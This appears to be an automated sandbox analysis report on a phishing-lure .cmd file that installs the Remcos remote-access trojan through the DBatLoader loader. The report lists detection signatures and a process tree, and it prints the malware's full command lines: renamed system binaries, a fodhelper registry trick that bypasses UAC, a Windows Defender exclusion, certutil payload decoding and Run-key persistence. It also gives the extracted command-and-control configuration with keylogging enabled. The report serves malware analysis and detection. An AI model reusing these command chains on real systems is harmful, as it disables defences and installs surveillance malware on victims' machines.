Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase Order is approved26042024.cmd

Overview

General Information

Sample name:Purchase Order is approved26042024.cmd
Analysis ID:1432341
MD5:8d5ff3734fb8dddaf133ff8ef662aa1d
SHA1:08f0f2978d3c989b0b6ce03a804a6b0cfc0453b6
SHA256:0874f8f4032c3a90a16ad54d23d9ef6c47b1a5a3c1056cbe125e6ed1846cf94c
Tags:cmd
Infos:

Detection

Remcos, DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Snort IDS alert for network traffic
UAC bypass detected (Fodhelper)
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Installs a global keyboard hook
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Registers a new ROOT certificate
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Program Location with Network Connections
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Reg Add Open Command
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 1216 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 1048 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 1020 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 5432 cmdline: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 3752 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 6648 cmdline: extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 2792 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • xkn.exe (PID: 5496 cmdline: C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " MD5: 04029E121A0CFA5991749937DD22A1D9)
        • alpha.exe (PID: 7752 cmdline: "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • ger.exe (PID: 7776 cmdline: C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users " MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • fodhelper.exe (PID: 8016 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 85018BE1FD913656BC9FF541F017EACD)
    • alpha.exe (PID: 7972 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 6972 cmdline: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 6348 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 8064 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 4500 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 5044 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • sppsvc.pif (PID: 5228 cmdline: C:\Users\Public\Libraries\sppsvc.pif MD5: F83153803040CB7382CF1CC8ABEBD4C7)
      • extrac32.exe (PID: 8036 cmdline: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\sppsvc.pif C:\\Users\\Public\\Libraries\\Kpeyvroh.PIF MD5: 9472AAB6390E4F1431BAA912FCFF9707)
    • alpha.exe (PID: 8012 cmdline: C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 6304 cmdline: C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 7512 cmdline: C:\\Users\\Public\\alpha /c del "C:\Users\Public\ger.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 5496 cmdline: C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 2792 cmdline: taskkill /F /IM SystemSettings.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • alpha.exe (PID: 7816 cmdline: C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • chrome.exe (PID: 4040 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7232 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1956,i,11964562257046214624,14274192803590327640,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • SystemSettingsAdminFlows.exe (PID: 7824 cmdline: "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper MD5: 5FA3EEF00388ED6344B4C35BA7CAA460)
  • Kpeyvroh.PIF (PID: 7552 cmdline: "C:\Users\Public\Libraries\Kpeyvroh.PIF" MD5: F83153803040CB7382CF1CC8ABEBD4C7)
  • Kpeyvroh.PIF (PID: 1528 cmdline: "C:\Users\Public\Libraries\Kpeyvroh.PIF" MD5: F83153803040CB7382CF1CC8ABEBD4C7)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "^www.pentegrasystem.com:9231:0", "Assigned name": "NEWRemoteHost-APRILFILE", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-3A6IQD", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6c4c0:$a1: Remcos restarted by watchdog!
          • 0x6ca38:$a3: %02i:%02i:%02i:%03i
          0000001C.00000002.4509142171.0000000002891000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
            Click to see the 27 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            36.2.Kpeyvroh.PIF.29a0000.0.raw.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
              36.2.Kpeyvroh.PIF.29a0000.0.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
                36.2.Kpeyvroh.PIF.21060000.4.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  36.2.Kpeyvroh.PIF.21060000.4.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    36.2.Kpeyvroh.PIF.21060000.4.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                    • 0x6c4a8:$a1: Remcos restarted by watchdog!
                    • 0x6ca20:$a3: %02i:%02i:%02i:%03i
                    Click to see the 7 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Execution from Suspicious Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe, CommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1216, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe, ProcessId: 1020, ProcessName: alpha.exe
                    Sigma detected: New RUN Key Pointing to Suspicious Folder
                    Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Kpeyvroh.url, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\sppsvc.pif, ProcessId: 5228, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kpeyvroh
                    Sigma detected: Parent in Public Folder Suspicious Process
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe, CommandLine: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe, CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe, ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 1020, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe, ProcessId: 5432, ProcessName: extrac32.exe
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " , CommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1216, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " , ProcessId: 2792, ProcessName: alpha.exe
                    Sigma detected: Suspicious Program Location with Network Connections
                    Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 142.250.217.193, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Libraries\sppsvc.pif, Initiated: true, ProcessId: 5228, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49729
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Kpeyvroh.url, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\sppsvc.pif, ProcessId: 5228, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kpeyvroh
                    Sigma detected: Execution of Suspicious File Type Extension
                    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\sppsvc.pif, CommandLine: C:\Users\Public\Libraries\sppsvc.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\sppsvc.pif, NewProcessName: C:\Users\Public\Libraries\sppsvc.pif, OriginalFileName: C:\Users\Public\Libraries\sppsvc.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1216, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Libraries\sppsvc.pif, ProcessId: 5228, ProcessName: sppsvc.pif
                    Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
                    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\Public\xkn.exe, ProcessId: 5496, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t3ru4bzt.u0w.ps1
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " , CommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1216, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " , ProcessId: 2792, ProcessName: alpha.exe
                    Sigma detected: Suspicious Reg Add Open Command
                    Source: Process startedAuthor: frack113: Data: Command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " , CommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1216, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " , ProcessId: 2792, ProcessName: alpha.exe

                    Stealing of Sensitive Information

                    barindex
                    Sigma detected: Remcos
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\Public\Libraries\sppsvc.pif, ProcessId: 5228, TargetFilename: C:\ProgramData\remcos\logs.dat

                    Snort Signatures

                    Timestamp:04/26/24-21:56:24.593602
                    SID:2032776
                    Source Port:49730
                    Destination Port:9231
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:04/26/24-21:58:37.300504
                    SID:2032777
                    Source Port:9231
                    Destination Port:49730
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: http://geoplugin.net/json.gp/CURL Reputation: Label: phishing
                    Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
                    Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
                    Found malware configuration
                    Source: 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "^www.pentegrasystem.com:9231:0", "Assigned name": "NEWRemoteHost-APRILFILE", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-3A6IQD", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.2419249499.000000000076D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.4524281071.000000001B7CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000002.2504569132.000000000067A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000003.3094133776.0000000000801000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.4503348467.0000000000823000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: sppsvc.pif PID: 5228, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Kpeyvroh.PIF PID: 1528, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE42F38 ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,InitializeCriticalSection,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,LocalFree,lstrcmpW,#357,CoInitialize,#357,#357,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,25_2_00007FF67DE42F38
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE42C2C CryptFindOIDInfo,memset,CryptRegisterOIDInfo,GetLastError,#357,25_2_00007FF67DE42C2C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE87F14 CryptAcquireCertificatePrivateKey,GetLastError,#357,CryptSetProvParam,GetLastError,GetSecurityDescriptorLength,#359,CryptReleaseContext,25_2_00007FF67DE87F14
